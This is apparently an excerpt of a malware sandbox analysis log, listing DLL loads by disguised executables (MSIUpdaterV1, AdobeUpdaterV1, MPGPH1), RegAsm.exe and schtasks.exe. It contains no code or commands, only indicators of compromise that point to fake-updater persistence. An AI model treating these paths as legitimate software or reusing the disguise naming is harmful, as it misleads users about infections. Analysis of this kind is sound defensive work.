Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: d3d11.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dxgi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dxcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: devobj.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: version.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: wldp.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: version.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: wldp.dll
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Section loaded: version.dll
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Section loaded: version.dll
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
